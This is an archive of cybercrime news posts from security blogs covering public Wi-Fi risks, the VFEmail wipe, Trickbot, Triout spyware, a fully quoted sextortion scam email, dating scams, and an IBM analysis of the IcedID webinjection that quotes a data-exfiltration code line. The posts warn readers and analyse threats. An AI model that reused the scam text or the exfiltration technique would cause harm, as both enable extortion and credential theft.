Category Archives: Cybercrime

The Risks of Public Wi-Fi and How to Close the Security Gap

public wi-fi risksAs I write this blog post, I’m digitally exposed, and I know it. For the past week, I’ve had to log on to a hospital’s public Wi-Fi each day to work while a loved one recuperates.

What seems like a routine, casual connection to the hospital’s Wi-Fi isn’t. Using public Wi-Fi is a daily choice loaded with risk. Sure, I’m conducting business and knocking out my to-do list like a rock star but at what cost to my security?

The Risks

By using public Wi-Fi, I’ve opened my online activity and personal data (via my laptop) up to a variety of threats including eavesdropping, malware distribution, and bitcoin mining. There’s even a chance I could have logged on to a malicious hotspot that looked like the hospital network.

Like many public Wi-Fi spots, the hospital’s network could lack encryption, which is a security measure that scrambles the information sent from my computer to the hospital’s router so other people can’t read it. Minus encryption, whatever I send over the hospital’s network could potentially be intercepted and used maliciously by cybercriminals.

Because logging on to public Wi-Fi is often a necessity — like my situation this week — security isn’t always the first thing on our minds. But over the past year, a new normal is emerging. A lot of us are thinking twice. With data breaches, privacy concerns, the increase in the market for stolen credentials, and increasingly sophisticated online scams making the headlines every day, the risks of using public Wi-Fi are front and center.

Rising Star: VPNpublic wi-fi risks

The solution to risky public Wi-Fi? A Virtual Private Network (VPN). A VPN allows users to securely access a private network and share data remotely through public networks. Much like a firewall protects the data on your computer, a VPN protects your online activity by encrypting your data when you connect to the internet from a remote or public location. A VPN also conceals your location, IP address, and online activity.

Using a VPN helps protect you from potential hackers using public Wi-Fi, which is one of their favorite easy-to-access security loopholes.

Who Needs a VPN?

If you (or your family members) travel and love to shop online, access your bank account, watch movies, and do everyday business via your phone or laptop, a VPN would allow you to connect safely and encrypt your data no matter where you are.

A VPN can mask, or scramble, your physical location, banking account credentials, and credit card information.

Also, if you have a family data plan you’ve likely encouraged your kids to save data by connecting to public Wi-Fi whenever possible. Using a VPN, this habit would be secured from criminal sniffers and snoopers.

A VPN allows you to connect to a proxy server that will access online sites on your behalf and enables a secure connection most anywhere you go. A VPN also allows hides your IP address and allows you to browse anonymously from any location.

How VPNs work

To use a VPN you subscribe to VPN service, download the app onto your desktop or phone, set up your account, and then log onto a VPN server to conduct your online activity privately.

If you are still logging on to public Wi-Fi, here are a few tips to keep you safe until VPNs become as popular as Wi-Fi.

Stay Safe on Public Wi-Fi 

Verify your connection. Fake networks that mine your data abound. If you are logging on to Wi-Fi in a coffee shop, hotel, airport, or library, verify the exact name of the network with an employee. Also, only use Wi-Fi that requires a password to log on.public wi-fi risks

Don’t get distracted. For adults, as well as kids, it’s easy to get distracted and absorbed with our screens — this is risky when on public Wi-Fi, according to Diana Graber, author of Raising Humans in a Digital World. “Knowing how to guard their personal information online is one of the most important skills parents need to equip their young kids with today,” says Graber. “Lots of young people visit public spaces, like a local coffee shop or library, and use public Wi-Fi to do homework, for example. It’s not uncommon for them to get distracted by something else online or even tempted to buy something, without realizing their personal information (or yours!) might be at risk.”

Disable auto Wi-Fi connect. If your phone automatically joins surrounding networks, you can disable this function in your settings. Avoid linking to unknown or unrecognized networks.

Turn off Wi-Fi when done. Your computer or phone can still transmit data even when you are not using it. Be sure to disable your Wi-Fi from the network when you are finished using it.

Avoid financial transactions. If you must use public Wi-Fi, don’t conduct a sensitive transaction such as banking, shopping, or any kind of activity that requires your social security or credit card numbers or password use. Wait until you get to a secured home network to conduct personal business.

Look for the HTTPS. Fake or unsecured websites will not have the HTTPS in their address. Also, look for the little lock icon in the address bar to confirm a secure connection.

Secure your devices. Use a personal VPN as an extra layer of security against hackers and malware.

The post The Risks of Public Wi-Fi and How to Close the Security Gap appeared first on McAfee Blogs.

Hacker destroys VFEmail service, wipes backups

An email service called VFEmail was essentially put out of business after a hack intended to delete everything in (and out of) sight.

“Yes, @VFEmail is effectively gone. It will likely not return. I never thought anyone would care about my labor of love so much that they’d want to completely and thoroughly destroy it.”

This wasn’t “just” a simple webpage compromise, or some sort of database dump. In fact, it was something altogether quite worse. Put simply, the total annihilation of a service and most, if not all, of its infrastructure.

What happened?

Users of VFEmail woke to the following message on the service’s website:

VFEmail message

Click to enlarge

!!!ALERT!!!! Update Feb 11 2019

vfemail(dot)net and mail(dot)vfemail(dot)net are currently unavailable.

We have suffered catastrophic destruction at the hands of a hacker, last seen as aktv[redacted]

This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can.

New updates 2/11/19 6pm CST:

Incoming mail is now being delivered.

Webmail is up. Note-mailboxes are created upon new mail delivery. If you cannot login, you may not have received mail.

Mailboxes are new, no subfolders exist.

No filters are in place. If you created a filter with Horde, Login to Horde, Create any folders you need. 

Click Filter, Click Script, then click ‘Activate Script’.

There is no spam scanning at this time – Incoming mail may be Spam scanned depending on DNS status.

Free users should not attempt to send email, there is currently no delivery mechanism for free accounts. Paid accounts should be useable, including Horde/Roundcube contacts and calendars.

At this time I am unsure of the status of existing mail for US users. If you have your own email client, DO NOT TRY TO MAKE IT WORK.

If you reconnect your client to your new mailbox, all your local mail will be lost.

Ouch.

Did they put word out on social media?

You bet they did, and the Tweets don’t make for pleasant reading:

https://platform.twitter.com/widgets.js

https://platform.twitter.com/widgets.js

It may sound a bit exciting to walk in on the scene of the crime, but I can assure you it’d only involve lots of “oh no” types of expression. If they’re already wiping your backups, the game is indeed over.

Did they recover?

Sadly things didn’t improve, and a few hours later the full damage report was available:

https://platform.twitter.com/widgets.js
All data was encrypted at least, but said data basically vanished into thin air when it was scrubbed:

https://platform.twitter.com/widgets.js
They also managed to destroy various VMs using different forms of authentication.

https://platform.twitter.com/widgets.js

“Just attack and destroy”

Services and sites have been attacked severely in the past, some to the point of destruction. However, there’s almost always an overt reason given, or a ransom, or some other clue.

Here, it’s nothing but complete devastation and a service in existence since 2001 absolutely ruined in the bargain. There’s no indication as to how they got in, or if an important system had no multi-factor authentication. A number of commentators have suggested this flaw may have been a way in for the attacker.

Until detailed analysis is published, it’s hard to say why this happened. Did the owner of the service aggravate a talented hacker? Or could one of the service users have drawn attention from unwanted sources, and this is the end result? It’ll be fascinating to find out. But if you operate a similar service, you may wish to consider a decent offline backup system in the meantime.

The post Hacker destroys VFEmail service, wipes backups appeared first on Malwarebytes Labs.

Bank of Valletta suspended all operations in wake of cyber attack

Maltese Bank of Valletta (BOV) has been breached by hackers and has temporarily suspended all of its operations to minimize risk and review its systems. The bank shuttered its braches across the island, disabled ATMs, internet and mobile banking and prevented its customers from using BOV cards for effecting payments in stores, hotels, restaurants, etc. What is known about the attack? According to Times of Malta, the attack was detected shortly after the start of … More

The post Bank of Valletta suspended all operations in wake of cyber attack appeared first on Help Net Security.

Trickbot becomes one of the most dangerous pieces of modular malware hitting enterprises

Along with Emotet, Trickbot has become one of the most versatile and dangerous pieces of modular malware hitting enterprise environments. Most recently, its creators have added another dangerous module to it, which allows it to extract and exfiltrate credentials from popular remote access software. Trickbot’s evolution Like Emotet, Trickbot started as a pure banking Trojan but was slowly developed through the years and now has many more additional capabilities. It can: Achieve persistence (through scheduled … More

The post Trickbot becomes one of the most dangerous pieces of modular malware hitting enterprises appeared first on Help Net Security.

Most wanted malware in January 2019: A new threat speaks up

Check Point’s Global Threat Index for January 2019 reveals a new backdoor Trojan affecting Linux servers, which is distributing the XMRig crypto-miner. The new malware, dubbed SpeakUp, is capable of delivering any payload and executing it on compromised machines. The new Trojan currently evades all security vendors’ anti-virus software. It has been propagated through a series of exploitations based on commands it receives from its control center, including the 8th most popular exploited vulnerability, “Command … More

The post Most wanted malware in January 2019: A new threat speaks up appeared first on Help Net Security.

Indictment: Hackers Charged With Making Threats to Schools

Two computer hackers were charged with sending false shooting and bomb threats to hundreds of schools and other institutions in the U.S. and Britain, federal prosecutors said Tuesday.

The men are members of Apophis Squad, a worldwide collective of hackers intent on using the internet to “sow chaos,” the Department of Justice said in Los Angeles.

read more

Healthcare email fraud: Attack attempts jump 473% over two years

Proofpoint found that healthcare organisations were targeted in 96 email fraud attacks on average in Q4 2018 – a 473 percent jump from Q1 2017. More than half of these organisations (53 percent) were attacked more often, with incidents up between 200 and 600 percent during the two-year period. Researchers analysed more than 160 billion emails sent across 150 countries in both 2017 and 2018 to identify email fraud attack trends targeting more than 450 … More

The post Healthcare email fraud: Attack attempts jump 473% over two years appeared first on Help Net Security.

Impersonation, sender forgery and corporate email spoofing top the charts

This Q4 of 2018 was a busy period for phishing scammers. INKY researchers saw a spike in email volume this time of year as people use email to gather their receipts from online shopping, shipping notifications, returns, and virtual holiday greetings. For its 2018 Q4 email security report, the company pulled out the highest volume attack types and broke down each one. The majority of attacks that were analyzed showed an increase in target personalization, … More

The post Impersonation, sender forgery and corporate email spoofing top the charts appeared first on Help Net Security.

Sextortion Bitcoin scam makes unwelcome return

Heads up: a particularly nasty sextortion Bitcoin scam from at least the middle of 2018 is making the rounds once again.

The scam involves making use of old breach dumps, then emailing someone from the list and reminding them of their old password.

When something lands in your mailbox with “Hey, remember this?” it’s a surefire way to focus the reader’s attention. Pressure is then applied to start sending over some Bitcoin…or else.

What is the threat being made?

The generally accepted theory is that the scammer digs up personally identifiable information from old data breaches, including email addresses and passwords, plugs it into some sort of automated script, and then fires out thousands of emails.

Those mails reach people from said breach, and they then see talk of somebody “knowing” their login details. That’s then used as leverage to claim the attacker has access to their PC, files, folders, webcams, browsing history—in a nutshell, anything personal and sensitive. The scarier they can make it sound, the better. In fact, one of the more eye-popping claims is that the scammer has video of the user viewing adult websites, and they will share this video with all the user’s contacts unless they pony up and pay a Bitcoin ransom.

And in classic ransomware fashion, there’s typically a ticking clock. Giving users a short time limit to deliver the payment is social engineering at its finest.

What next?

The recipient may well have a panic attack, that’s what. To be suddenly confronted with an ancient (but potentially still active) password is certainly going to give a bit of a shock to the system. It’s at this point the confusion sets in, as they start to wonder what on Earth the attacker has. Did they really see what they claimed to see? Do they actually have video footage? What other potentially embarrassing (or worse) content could they use to extort and blackmail?

What do they really have?

A large throne of lies, is what.

Yes, they have your password from a long time ago.

No, they do not have access to your computer. And no, even if you were checking out adult sites, they don’t have video of you doing so.

What they might have is access to your email account associated with the breach, if you haven’t changed the password since it took place. They could also potentially start trying to log into other accounts you have with the same password. If this is the case, you should fire up a password manager and get to work changing things.

In fact, you should do that if you share passwords across accounts in any case.

Okay, back to the scam.

What does the email say?

It’s a fairly standard template, and hunting for portions of the below mail will throw up any number of hits in Google and other search engines.

Click to enlarge

The email reads as follows:

I am well aware [REDACTED] is your pass words. Lets get right to point. Neither anyone has paid me to investigate you. You may not know me and you are probably thinking why you’re getting this e-mail? 

actually, i installed a software on the adult videos (pornographic material) web-site and do you know what, you visited this website to have fun (you know what i mean). While you were viewing videos, your web browser began working as a Remote Desktop that has a keylogger which gave me accessibility to your display and also cam. Just after that, my software gathered every one of your contacts from your Messenger, Facebook, as well as email . after that i created a double video. 1st part displays the video you were viewing (you’ve got a nice taste haha), and next part shows the recording of your cam, yeah its you. 

You have not one but two choices. Shall we read up on these options in aspects: 

First alternative is to just ignore this message. in such a case, i am going to send out your actual video to every single one of your personal contacts and think regarding the awkwardness you will definitely get. and definitely if you happen to be in a loving relationship, how it would affect? 

Number 2 solution is to pay me $889. Lets name it as a donation. in this situation, i most certainly will asap remove your video footage. You could carry on daily life like this never occurred and you surely will never hear back again from me.

You’ll make the payment through Bi‌tco‌in (if you don’t know this, search for ‘how to buy b‌itcoi‌n’ in Google). 

B‌T‌C‌ ad‌dre‌ss to send to: [REDACTED]

[CaSe sensitive, copy & paste it] 

if you are wondering about going to the law enforcement officials, well, this message can not be traced back to me. I have dealt with my actions. i am also not attempting to demand a huge amount, i would like to be compensated. within this%} emaiQUNdkpeC [SIC] if i do not receive the ‌bi‌tco‌in‌, i will send your video recording to all of your contacts including family members, coworkers, and so forth. Having said that, if i receive the payment, i will erase the recording immediately. If you really want proof, reply Yup then i will send out your video to your 9 friends. This is a non-negotiable offer, so don’t waste mine time and yours by replying to this e mail.

That’s pretty sneaky

It is, and I’d be surprised if there aren’t many others waking up to emails identical to the above. Should you receive one yourself, do the following:

  1. Don’t panic. They absolutely do not have the keys to your computer.
  2. See if the email in question pops up over on Haveibeenpwned.
  3. See if your password does the same thing.
  4. At this point, you may have a fairly good idea which breach they grabbed your old login from, which is always useful information to have.
  5. Delete the email you were sent, and under no circumstances pay them a penny/dime/insert currency of choice here.

Scare tactics: an evil practice

The anonymous sender of these mails doesn’t care about the trauma they could cause at the other end. These missives would be particularly traumatic for anyone involved in (say) a revenge porn case previously. And make no mistake, generic Internet blackmail threats can kill.

If you’re able to report these mails for spam/abuse before deleting, do so. There’s a remote chance you could actually save someone’s life while making the Internet a little safer into the bargain.

The post Sextortion Bitcoin scam makes unwelcome return appeared first on Malwarebytes Labs.

Zero trust browsing: Protect your organization from its own users

To the casual observer, the cyberattack landscape is constantly shifting. In recent years, the threats and scams have evolved from Nigerian princes to stranded travelers, pop-ups warning of outdated software to ransomware, cryptojacking, phishing and spear phishing. Predictions for 2019 are full of dire warnings about the very-real explosion of phishing, backed by geometric increases in phishing sites as the number of malware sites drops. Just as 2018 predictions focused on cryptojacking and ransomware were … More

The post Zero trust browsing: Protect your organization from its own users appeared first on Help Net Security.

Average DDoS attack volumes grew by 194% in 12 months

The volume and complexity of DDoS attacks continued to grow in Europe during the final quarter of 2018, according to Link11. While Link11’s Security Operations Center (LSOC) registered 13,910 attacks in Q4 (12.7% down compared to Q3), the average attack volume grew by 8.7% to 5Gbps, and 59% of attacks used multiple attack vectors. Key findings of Link11’s Q4 DDoS report include: Average attack volumes grew by 194% in 12 months: In Q4 2018, average … More

The post Average DDoS attack volumes grew by 194% in 12 months appeared first on Help Net Security.

E Hacking News – Latest Hacker News and IT Security News: Android Spyware "Triout" Back With Spying Abilities And New Malicious Schemes






An android malware in the guise of an online privacy app, is all set to cause a lot of harm as it’s resurfaced as a more malicious version of itself and has acquired spy abilities.

The application tries to trick the users into downloading and then starts working its method.

Triout, the application is created to help users dodge censorship on the internet.

The campaign had been active since May last year, under the guise of an adult 
application.

August, 2018 is when the spyware was discovered, because of the massive amounts of information it was harvesting, including photos, text conversations, and phone conversations.

Collecting GPS information about the victims and making the user’s location vulnerable are two of the other mal effects.


With changed tactics and better malicious effects to it, the malware is being distributed under the cloaks of a stolen but legit privacy tool from Google play store.

Psiphon is the privacy tool behind whose face version Triout is hiding. This application is widely used and has been downloaded like a million times.

Third party sites also provide this app on their platforms, in case hackers don’t seem to have access to play store of Google.

The fake version of Psiphon works in exactly the same way as the real version of it. The looks and the interface have all been cleverly matched.



A particular type of set of victims is being targeted via Triout so that it doesn’t raise much suspicion.

When the malware was discovered it was found to be targeting users from Germany and South Korea.

Spear-phishing is another concept that is reportedly being employed by the cyber-cons to ensure that the users download their malicious app.

The way to lure in the victims and the commands and controls of Triout have been cunningly altered to extract a hike in the success rate.


Reportedly, the updated versions of Triout are being uploaded from various distinct locations of the world, a few being Russia, France and US.

The origin of the campaign and the cyber-cons behind it are still behind the curtain and this is what makes Triout more malicious.

According to the leading security researchers, this application possesses super spying powers and is deliberately fabricated to perform activities like espionage.

The researchers implore the users to download applications only from official sites and try to steer clear off any suspicious looking applications and refrain from downloading it.



E Hacking News - Latest Hacker News and IT Security News

Android Spyware "Triout" Back With Spying Abilities And New Malicious Schemes






An android malware in the guise of an online privacy app, is all set to cause a lot of harm as it’s resurfaced as a more malicious version of itself and has acquired spy abilities.

The application tries to trick the users into downloading and then starts working its method.

Triout, the application is created to help users dodge censorship on the internet.

The campaign had been active since May last year, under the guise of an adult 
application.

August, 2018 is when the spyware was discovered, because of the massive amounts of information it was harvesting, including photos, text conversations, and phone conversations.

Collecting GPS information about the victims and making the user’s location vulnerable are two of the other mal effects.


With changed tactics and better malicious effects to it, the malware is being distributed under the cloaks of a stolen but legit privacy tool from Google play store.

Psiphon is the privacy tool behind whose face version Triout is hiding. This application is widely used and has been downloaded like a million times.

Third party sites also provide this app on their platforms, in case hackers don’t seem to have access to play store of Google.

The fake version of Psiphon works in exactly the same way as the real version of it. The looks and the interface have all been cleverly matched.



A particular type of set of victims is being targeted via Triout so that it doesn’t raise much suspicion.

When the malware was discovered it was found to be targeting users from Germany and South Korea.

Spear-phishing is another concept that is reportedly being employed by the cyber-cons to ensure that the users download their malicious app.

The way to lure in the victims and the commands and controls of Triout have been cunningly altered to extract a hike in the success rate.


Reportedly, the updated versions of Triout are being uploaded from various distinct locations of the world, a few being Russia, France and US.

The origin of the campaign and the cyber-cons behind it are still behind the curtain and this is what makes Triout more malicious.

According to the leading security researchers, this application possesses super spying powers and is deliberately fabricated to perform activities like espionage.

The researchers implore the users to download applications only from official sites and try to steer clear off any suspicious looking applications and refrain from downloading it.

Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account

Online Dating ScamsIt’s hard to believe that as savvy as we’ve become about our tech, people are still getting catfished, scammed, and heartbroken in their pursuit of love online.

The dinner conversation between bystanders goes something like this: “How could anyone be so dumb? Seriously? If they are going to be that reckless and uninformed, then maybe they deserve what they got!”

Some friends and I recently had a similar conversation about online dating scams. I noticed, however, that one friend, Sarah*, wasn’t so eager to jump into the conversation. She shrunk back in the booth and quietly sipped her margarita. Only later did she share her story with me.

The power of love

A single mom in her late 40s, well-educated, and attractive, Sarah’s teenager had convinced her to join a dating site the year before. She was especially lonely after her divorce three years earlier, so she agreed to create a profile on a popular dating app. After a handful of dates fell flat, she found Scott. He was charismatic, kind. “We had an instant connection,” according to Sarah. They spent hours on the phone sharing their deepest secrets and even started imagining a future together. But after about three months, Scott fell on hard times. At first, he needed to borrow $400 to pay for airfare to visit a dying relative, which he paid back immediately. Over the next few months, the numbers grew to $1,000 for rent and $3,000 for a business venture.

Online Dating Scams

Before long, Sarah had loaned her new love over $8,500. When she pressed him to repay the money, Scott ghosted Sarah online, moved out of town, and she never saw him again. My friend didn’t share her story with many people. She didn’t report it. She was too embarrassed and humiliated and even became depressed following what she calls “the Scott scam.” Her trust in other people and in love itself has been obliterated.

Sarah’s story doesn’t just echo that of desperate, clueless people, or lonely older women. Scammers are targeting good people who still believe in and value love and companionship. The pursuit of love online extends to adults as well as teens.

Confidence Fraud

Law enforcement calls these kinds of online romance scams confidence fraud because scammers will take a considerable amount of time gaining the trust and confidence of their victims. They will appear empathetic and supportive as they gather personal information they can use over time to carry out their scam.

According to the Federal Bureau of Investigation (FBI) confidence fraud has jumped 20% in the past year despite reports and warnings — especially around this time of year.

The FBI’s Internet Crime Complaint Center (IC3) reports that romance scams top all other financial online crimes. In 2016, people reported almost 15,000 romance scams to IC3 (nearly 2,500 more than the previous year), with losses exceeding $230 million.

Tips for Safe Online Dating

Never send money. Be it a romantic relationship you’ve engaged with or a phishing email, no matter the sob story, do not send money to anyone online. If you do send money, put a loan agreement in place that is legally enforceable should one party default.

Suspicious behavior. If someone promises to meet you somewhere but keeps canceling or if he or she refuses to video chat, those are red flags. Technology means anyone from anywhere in the world can successfully maintain a scam.Online Dating Scams

Take things slow. If someone is pushing the pace of a relationship or too quick to declare love and talk about the future, pause and assess the situation.

Do a background check. Love is a powerful force and can easily cloud a person’s correct understanding of reality. If you dare to create a dating profile, make a deal with yourself that you will extend the same courage to doing a background check on someone.

Be a sleuth. Don’t be afraid to gather facts on someone you’ve met online. Simple steps such as Googling the person’s name or dropping their photo in Google’s Reverse Image Search will help you get a better understanding of a person. Have faith: Good, legitimate people do exist. However, if there’s anything dubious, it’s best to find it out earlier rather than later. Part of doing your homework is tracking down mutual friends and making inquiries about the person you are talking with online.

Keep your social profiles private. Experts agree that you should edit your online footprint before you start dating people you’ve met online. Making your Instagram, Twitter, and Facebook private will guard you against potential.

Never send racy photos. Some scammers gain the confidence of their victims with every intention of extorting them in the future. They will threaten to send any racy photos with your family, friends, or business associates. The best way to avoid this is to never, ever send racy photos to anyone.Online Dating Scams

Google yourself, restrict info. Google yourself to see if there are any digital breadcrumbs that give away your home address or phone number. If possible, delete or revise that info. Likewise, go through your social accounts and remove any personal information you’ve shared in the past. Digital stalking is a risk for people who date online so turn off GPS on your dating apps and make sure your profile information is vague. Even if you get comfortable online with others, never get too comfortable since apps have privacy loopholes that can easily be exploited by hackers.

Take solid precautions. Enlist at least one friend as your dating safety pal. This will be the person who knows where you are going, who you will be with, and the background on the person you are meeting. Ask that person to check in with you during the date and carry pepper spray or a taser for physical protection. Go the extra step and turn on your Friend Finder or a location app that allows safety friend to track your whereabouts during a date.

*Names have been changed

The post Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account appeared first on McAfee Blogs.

Thousands Of Users Thrashed By Extremely Real-looking-Fake-Scans Scam



Thousands of users have encountered a severe threat from scammers who are employing cunning use of JavaScript and HTML codes by way of “Potentially Unwanted Applications”.

A major security researching organization uncovered a recent development in the scamming area where PUAs and POAs are being employed.

These scams could be categorized as tech-support scams which primarily work on scaring the victim into doing something unforeseen by the victim themselves.

After fake-calls, potentially unwanted applications have become quite common, but the latest twist is the shrewd usage of JavaScript and HTML code.

These codes specifically work on making the fake scans seem implausibly real, making it faster and easier for the scanners to fool their prey.

The well-known Norton Security applications are basically being stolen from the aforementioned organization.

These scams are in no way comparable to the basic and obvious anti-virus scams that are run on a common basis.

The scammers make the scan look so legit that it never occurs to the victim to question it at all.

There sure is an alert which pops up. The users think of it to be as one from an anti-malware app, when it’s actually coming from a web browser.

The way the scanners go around is that they offer an infection to be paired up by way of a 10-second scan. This obviously lures the users in swiftly.

A web-based dashboard is being implemented by the scammers to manage and monitor all the scams that are happening.

Thousands of dollars have been wrested from the victims that too by using overtly basic, fake looking contrivances.

Last three months of 2018 had been really busy for Symantec, the aforementioned organization, as they’ve blocked PUA installations around 89 million times.

There are several points that have to be kept in mind, for instance, no pop up is capable of analyzing the hard drive and the real files on it.

No anti-malware supplication would ask the user to download a separate application for the update process.

The best way to get saved from this kind of threat is looking out for an alert that mentions the remaining days left in the so called “subscription”.

Lookalike domains: Artificial intelligence may come to the rescue

In the world of network security, hackers often use lookalike domains to trick users to unintended and unwanted web sites, to deliver malicious software into or to send data out of victim’s network, taking advantage of the fact that it’s hard to tell the difference between those domains and the targets they look alike. For example, in a recent card skimming malware attack, domain google-analyitics.org was used to receive collected payment card data (there is … More

The post Lookalike domains: Artificial intelligence may come to the rescue appeared first on Help Net Security.

IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites

As part of the ongoing research into cybercrime tools targeting users of financial services and e-commerce, IBM X-Force analyzes the tactics, techniques and procedures (TTPs) of organized malware gangs, exposing their inner workings to help diffuse reliable threat intelligence to the security community.

In recent analysis of IcedID Trojan attacks, our team looked into how IcedID operators target e-commerce vendors in the U.S., the gang’s typical attack turf. The threat tactic is a two-step injection attack designed to steal access credentials and payment card data from victims. Given that the attack is separately operated, it’s plausible that those behind IcedID are either working on different monetization schemes or renting botnet sections to other criminals, turning it to a cybercrime-as-a-service operation, similar to the Gozi Trojan’s business model.

IcedID Origins

IBM Security discovered and named IcedID in September 2017. This modern banking Trojan features similar modules to malware like TrickBot and Gozi. It typically targets banks, payment card providers, mobile services providers, payroll, webmail and e-commerce sites, and its attack turf is mainly the U.S. and Canada. In their configuration files, it is evident that IcedID’s operators target business accounts in search of heftier bounties than those typically found in consumer accounts.

IcedID has the ability to launch different attack types, including webinjection, redirection and proxy redirection of all victim traffic through a port it listens on.

The malware’s distribution and infection tactics suggest that its operators are not new to the cybercrime arena; it has infected users via the Emotet Trojan since 2017 and in test campaigns launched in mid-2018, also via TrickBot. Emotet has been among the most notable malicious services catering to elite cybercrime groups from Eastern Europe over the past two years. Among its dubious customers are groups that operate QakBot, Dridex, IcedID and TrickBot.

Using ATSEngine to Orchestrate Attacks on E-Commerce Users

While current IcedID configurations feature both webinjection and malware-facilitate redirection attacks, let’s focus on its two-stage webinjection scheme. This tactic differs from similar Trojans, most of which deploy the entire injection either from the configuration or on the fly.

To deploy injections and collect stolen data coming from victim input, some IcedID operators use a commercial inject panel known as Yummba’s ATSEngine. ATS stands for automatic transaction system in this case. A web-based control panel, ATSEngine works from an attack/injection server, not from the malware’s command-and-control (C&C) server. It allows the attacker to orchestrate the injection process, update injections on the attack server with agility and speed, parse stolen data, and manage the operation of fraudulent transactions. Commercial transaction panels are very common and have been in widespread use since they became popular in the days of the Zeus Trojan circa 2007.

Targeting Specific E-Commerce Vendors

In the attack we examined, we realized that some IcedID operators are using the malware to target very specific brands in the e-commerce sphere. Our researchers noted that this attack is likely sectioned off from the main botnet and operated by criminals who specialize in fraudulent merchandise purchases and not necessarily bank fraud.

Let’s look at a sample code from those injections. This particular example was taken from an attack designed to steal credentials and take over the accounts of users browsing to a popular e-commerce site in the U.S.

As a first step, to receive any information from the attack server, the resident malware on the infected device must authenticate itself to the botnet’s operator. It does so using a script from the configuration file. If the bot is authenticated to the server, a malicious script is sent from the attacker’s ATSEngine server, in this case via the URL home_link/gate.php.

Notice that IcedID protects its configured instructions with encryption. The bot therefore requires a private key that authenticates versus the attacker’s web-based control panel (e.g., var pkey = “Ab1cd23”). This means the infected device would not interact with other C&C servers that may belong to other criminals or security researchers.

IBM X-Force Research

Figure 1: IcedID Trojan receives instructions on connecting to attack server (source: IBM Trusteer)

Next, we evaluated the eval(function(p, a, c, k, e, r) function in the communication with the attack server and got the following code to reveal. Encoding is a common strategy to pack code and make it more compact.

IBM X-Force Research

Figure 2: IcedID code designed to set the browser to accept external script injections (source: IBM Trusteer)

This function sets the infected user’s browser to accept external script injections that the Trojan will fetch from its operator’s server during an active attack.

The following snippet shows the creation of a document object model (DOM) script element with type Text/javascript and the ID jsess_script_loader. The injection’s developer used this technique to inject a remote script into a legitimate webpage. It fetches the remote script from the attacker’s C&C and then embeds it in a script tag, either in the head of the original webpage or in its body.

Taking a closer look at the function used here, we can see that it loads the script from the home_link of the ssid= of the infected user’s device, along with the current calendar date.

IBM X-Force Research

Figure 3: IcedID code designed to inject remote script into targeted website (source: IBM Trusteer)

Steps 1 and 2: JavaScript and HTML

To perform the webinjection, an external script, a malicious JavaScript snippet, is charged with injecting HTML code into the infected user’s browser. Using this tactic, the malware does not deploy the entire injection from the configuration file, which would essentially expose it to researchers who successfully decrypt the configuration. Rather, it uses an initial injection as a trigger to fetch a second part of the injection from its attack server in real time. That way, the attack can remain more covert and the attacker can have more agility in updating injections without having to update the configuration file on all the infected devices.

In the example below, the HTML code, named ccgrab, modifies the page the victim is viewing and presents social engineering content to steal payment card data. This extra content on the page prompts the victim to provide additional information about his or her identity to log in securely.

IBM X-Force Research

Figure 4: IcedID tricking victim with webinjection (source: IBM Trusteer)

The malware automatically grabs the victim’s access credentials and the webinjection requests the following additional data elements pertaining to the victim’s payment card:

  • Credit card number;
  • CVV2; and
  • The victim’s state of residence.

Once the victim enters these details, the data is sent to the attacker’s ATSEngine server in parsed form that allows the criminal to view and search data via the control panel.

IBM X-Force Research

Figure 5: Parsed stolen data sent to attacker’s injection server (source: IBM Trusteer)

Managing Data Theft and Storage

The malicious script run by the malware performs additional functions to grab content from the victim’s device and his or her activity. The content grabbing function also checks the validity of the user’s input to ensure that the C&C does not accumulate junk data over time and manages the attack’s variables.

IBM X-Force Research

Figure 6: Malicious IcedID script manages data grabbing (source: IBM Trusteer)

Once the data from the user is validated, it is saved to the C&C:

IBM X-Force Research

Figure 7: Saving stolen data to attack server logs (source: IBM Trusteer)

Injection Attack Server Functions

The attack server enables the attacker to command infected bots by a number of functions. Let’s look at the function list that we examined once we decoded IcedID’s malicious script:

Function name

Purpose

isFrame()

Checks for frames on the website to look for potential third-party security controls.

isValidCardNumber(a)

Validates that payment card numbers are correct. This function is likely based on the Luhn algorithm.

onLoaded()

The main function that sets off the data grabbing process.

addLog(a,b,c,d)

Adds new logs to the reports section in the attack server.

writeLog()

Writes logs to the attack server after validation of the private key and the victim’s service set identifier (SSID). This is achieved by the following script: getData(gate_link + a + “&pkey=” + urlEncode(pkey) + “&ssid=” + b, b)

The attack server enables the operator to use different functions that are sectioned into tabs on the control panel:

  • Accounts page functions — shows the account pages the victim is visiting with the infected user’s credentials.
  • Content variables — includes report generation, account page controls, pushing HTML content into pages the victim is viewing, and a comments module to keep track of activity.
  • Private functions to get HEX and decode.
  • Main page functions.
  • Comments global.
  • Reports global.

Figure 8 below shows the layout of information about functions used on a given infected device as it appears to the attacker using the ATSEngine control panel:

IBM X-Force Research

Figure 8: Attacker’s view from the control panel that manages stolen data (source: IBM Trusteer)

Data Management and Views

The ATSEngine control panel enables the attacker to view the active functions with a time stamp (see Figure 8). The following information is retrieved from the victim’s device and sent to the attack server:

  • Last report time from this infected device;
  • Victim’s IP Address;
  • Victim’s attributed BotID;
  • Victim’s login credentials to the website he or she is visiting;
  • Additional grabbed data from webinjection to the target page, including the victim’s name, payment card type, card number and CVV2, and state of residence; and
  • Comments section inserted by the attacker about the particular victim and his or her accounts.

A view from the control panel displays essential data in tables, providing the attacker with the victim’s login credentials to the targeted site:

IBM X-Force Research

Figure 9: Stolen account information parsed on control panel view (source: IBM Trusteer)

Sectioned IcedID Botnet

Following the analysis of IcedID’s injections and control panel features, our researchers believe that, much like other Trojan-operating gangs, IcedID is possibly renting out its infrastructure to other criminals who specialize in various fraud scenarios.

The control panel, a common element in online fraud operations, reveals the use of a transaction automation tool (ATS) by IcedID’s operators. This commercial panel helps facilitate bot control, data management and management of fraudulent activity. The panel of choice here is a longtime staple in the cybercrime arena called the Yummba/ATSEngine.

Fraud scenarios may vary from one operator to another, but IcedID’s TTPs remain the same and are applied to all the attacks the Trojan facilitates. As such, IcedID’s webinjections can apply to any website, and its redirection schemes can be fitted to any target.

Sharpened Focus in 2019

While some Trojan gangs choose to expand their attack turf into more countries, this requires funding, resources to build adapted attack tools, alliances with local organized crime and additional money laundering operations. In IcedID’s case, it does not appear the gang is looking to expand. Ever since it first appeared in the wild, IcedID has kept its focus on North America by targeting banks and e-commerce businesses in that region.

